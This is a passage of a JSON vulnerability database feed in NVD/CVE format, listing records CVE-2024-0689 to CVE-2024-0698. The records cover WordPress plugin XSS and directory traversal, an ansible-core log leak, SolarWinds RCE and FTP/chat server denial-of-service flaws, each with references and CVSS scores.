(FKA. PubSubHubbub)\" plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin settings in all versions up to, and including, 3.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pubsubhubbub:websub:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.2.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-25T02:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0689", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042177%40custom-field-suite&new=3042177%40custom-field-suite&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042177%40custom-field-suite&new=3042177%40custom-field-suite&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042177%40custom-field-suite&new=3042177%40custom-field-suite&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042177%40custom-field-suite&new=3042177%40custom-field-suite&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d8e967ce-fd36-44de-acca-c1985642ee5b?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d8e967ce-fd36-44de-acca-c1985642ee5b?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d8e967ce-fd36-44de-acca-c1985642ee5b?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d8e967ce-fd36-44de-acca-c1985642ee5b?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Custom Field Suite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a meta import in all versions up to, and including, 2.6.4 due to insufficient input sanitization and output escaping on the meta values. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:custom_field_suite_project:custom_field_suite:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.6.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-29T03:15Z", "lastModifiedDate" : "2025-02-05T18:11Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0690", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-116" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/errata/RHSA-2024:0733", "name" : "RHSA-2024:0733", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0733", "name" : "RHSA-2024:0733", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2246", "name" : "RHSA-2024:2246", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2246", "name" : "RHSA-2024:2246", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:3043", "name" : "RHSA-2024:3043", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:3043", "name" : "RHSA-2024:3043", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0690", "name" : "https://access.redhat.com/security/cve/CVE-2024-0690", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0690", "name" : "https://access.redhat.com/security/cve/CVE-2024-0690", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2259013", "name" : "RHBZ#2259013", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2259013", "name" : "RHBZ#2259013", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://github.com/ansible/ansible/pull/82565", "name" : "https://github.com/ansible/ansible/pull/82565", "refsource" : "", "tags" : [ "Issue Tracking", "Patch" ] }, { "url" : "https://github.com/ansible/ansible/pull/82565", "name" : "https://github.com/ansible/ansible/pull/82565", "refsource" : "", "tags" : [ "Issue Tracking", "Patch" ] }, { "url" : "https://security.netapp.com/advisory/ntap-20250117-0001/", "name" : "https://security.netapp.com/advisory/ntap-20250117-0001/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An information disclosure flaw was found in ansible-core due to a failure to respect the ANSIBLE_NO_LOG configuration in some scenarios. Information is still included in the output in certain tasks, such as loop items. Depending on the task, this issue may include sensitive information, such as decrypted secret values." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:redhat:ansible:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2.16.0", "versionEndExcluding" : "2.16.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:redhat:ansible:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2.15.0", "versionEndExcluding" : "2.15.9", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:redhat:ansible:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.4", "cpe_name" : [ ] } ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:redhat:ansible_automation_platform:2.4:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:redhat:ansible_developer:1.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:redhat:ansible_inside:1.2:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-06T12:15Z", "lastModifiedDate" : "2025-01-17T20:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0691", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3023924/filebird", "name" : "https://plugins.trac.wordpress.org/changeset/3023924/filebird", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3023924/filebird", "name" : "https://plugins.trac.wordpress.org/changeset/3023924/filebird", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/47f04985-dd9b-449f-8b4c-9811fe7e4a96?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/47f04985-dd9b-449f-8b4c-9811fe7e4a96?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/47f04985-dd9b-449f-8b4c-9811fe7e4a96?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/47f04985-dd9b-449f-8b4c-9811fe7e4a96?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The FileBird plugin for WordPress is vulnerable to Stored Cross-Site Scripting via imported folder titles in all versions up to, and including, 5.5.8.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. It may also be possible to socially engineer an administrator into uploading a malicious folder import." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ninjateam:filebird:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "5.5.8.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0692", "ASSIGNER" : "psirt@solarwinds.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-502" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://documentation.solarwinds.com/en/success_center/sem/content/release_notes/sem_2023-4-1_release_notes.htm", "name" : "https://documentation.solarwinds.com/en/success_center/sem/content/release_notes/sem_2023-4-1_release_notes.htm", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://documentation.solarwinds.com/en/success_center/sem/content/release_notes/sem_2023-4-1_release_notes.htm", "name" : "https://documentation.solarwinds.com/en/success_center/sem/content/release_notes/sem_2023-4-1_release_notes.htm", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-0692", "name" : "https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-0692", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-0692", "name" : "https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-0692", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The SolarWinds Security Event Manager was susceptible to Remote Code Execution Vulnerability. This vulnerability allows an unauthenticated user to abuse SolarWinds’ service, resulting in remote code execution." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:solarwinds:security_event_manager:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2023.4.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "ADJACENT_NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-03-01T09:15Z", "lastModifiedDate" : "2025-02-26T18:39Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0693", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://0day.today/exploit/description/39218", "name" : "https://0day.today/exploit/description/39218", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://0day.today/exploit/description/39218", "name" : "https://0day.today/exploit/description/39218", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://packetstormsecurity.com/files/176377/Easy-File-Sharing-FTP-Server-2.0-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/176377/Easy-File-Sharing-FTP-Server-2.0-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://packetstormsecurity.com/files/176377/Easy-File-Sharing-FTP-Server-2.0-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/176377/Easy-File-Sharing-FTP-Server-2.0-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.251479", "name" : "https://vuldb.com/?ctiid.251479", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251479", "name" : "https://vuldb.com/?ctiid.251479", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251479", "name" : "https://vuldb.com/?id.251479", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251479", "name" : "https://vuldb.com/?id.251479", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://www.youtube.com/watch?v=Rcl6VWg_bPY", "name" : "https://www.youtube.com/watch?v=Rcl6VWg_bPY", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://www.youtube.com/watch?v=Rcl6VWg_bPY", "name" : "https://www.youtube.com/watch?v=Rcl6VWg_bPY", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic was found in EFS Easy File Sharing FTP 2.0. Affected by this vulnerability is an unknown functionality. The manipulation of the argument username leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251479. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:easy_file_sharing_ftp_server_project:easy_file_sharing_ftp_server:2.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-18T23:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0694", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2023-6620. Reason: This candidate is a reservation duplicate of CVE-2023-6620. Notes: All CVE users should reference CVE-2023-6620 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-01-18T18:15Z", "lastModifiedDate" : "2024-01-18T18:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0695", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://packetstormsecurity.com/files/176381/Easy-Chat-Server-3.1-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/176381/Easy-Chat-Server-3.1-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://packetstormsecurity.com/files/176381/Easy-Chat-Server-3.1-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/176381/Easy-Chat-Server-3.1-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.251480", "name" : "https://vuldb.com/?ctiid.251480", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251480", "name" : "https://vuldb.com/?ctiid.251480", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251480", "name" : "https://vuldb.com/?id.251480", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251480", "name" : "https://vuldb.com/?id.251480", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.exploitalert.com/view-details.html?id=40072", "name" : "https://www.exploitalert.com/view-details.html?id=40072", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://www.exploitalert.com/view-details.html?id=40072", "name" : "https://www.exploitalert.com/view-details.html?id=40072", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://www.youtube.com/watch?v=nGyS2Rp5aEo", "name" : "https://www.youtube.com/watch?v=nGyS2Rp5aEo", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://www.youtube.com/watch?v=nGyS2Rp5aEo", "name" : "https://www.youtube.com/watch?v=nGyS2Rp5aEo", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, has been found in EFS Easy Chat Server 3.1. Affected by this issue is some unknown functionality of the component HTTP GET Request Handler. The manipulation of the argument USERNAME leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251480. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:easy_chat_server_project:easy_chat_server:3.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "LOW", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-18T23:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0696", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://pasteboard.co/wsTTLjp5UEPq.png", "name" : "https://pasteboard.co/wsTTLjp5UEPq.png", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://pasteboard.co/wsTTLjp5UEPq.png", "name" : "https://pasteboard.co/wsTTLjp5UEPq.png", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251481", "name" : "https://vuldb.com/?ctiid.251481", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251481", "name" : "https://vuldb.com/?ctiid.251481", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251481", "name" : "https://vuldb.com/?id.251481", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251481", "name" : "https://vuldb.com/?id.251481", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, was found in AtroCore AtroPIM 1.8.4. This affects an unknown part of the file /#ProductSerie/view/ of the component Product Series Overview. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251481 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:atrocore:atropim:1.8.4:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-18T23:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0697", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-22" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026806%40backuply&new=3026806%40backuply&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026806%40backuply&new=3026806%40backuply&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026806%40backuply&new=3026806%40backuply&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026806%40backuply&new=3026806%40backuply&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/70effa22-fbf6-44cb-9d1b-8625969c10ac?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/70effa22-fbf6-44cb-9d1b-8625969c10ac?source=cve", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/70effa22-fbf6-44cb-9d1b-8625969c10ac?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/70effa22-fbf6-44cb-9d1b-8625969c10ac?source=cve", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Backuply – Backup, Restore, Migrate and Clone plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.2.3 via the node_id parameter in the backuply_get_jstree function. This makes it possible for attackers with administrator privileges or higher to read the contents of arbitrary files on the server, which can contain sensitive information." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:softaculous:backuply:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.2.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.9, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.2, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-27T05:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0698", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/easyappointments/trunk/public/class-easyappointments-public.php#L141", "name" : "https://plugins.trac.wordpress.org/browser/easyappointments/trunk/public/class-easyappointments-public.php#L141", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easyappointments/trunk/public/class-easyappointments-public.php#L141", "name" : "https://plugins.trac.wordpress.org/browser/easyappointments/trunk/public/class-easyappointments-public.php#L141", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4b002e40-712d-4c3f-b168-9132e7b77e60?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4b002e40-712d-4c3f-b168-9132e7b77e60?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4b002e40-712d-4c3f-b168-9132e7b77e60?source=cve", "name" : 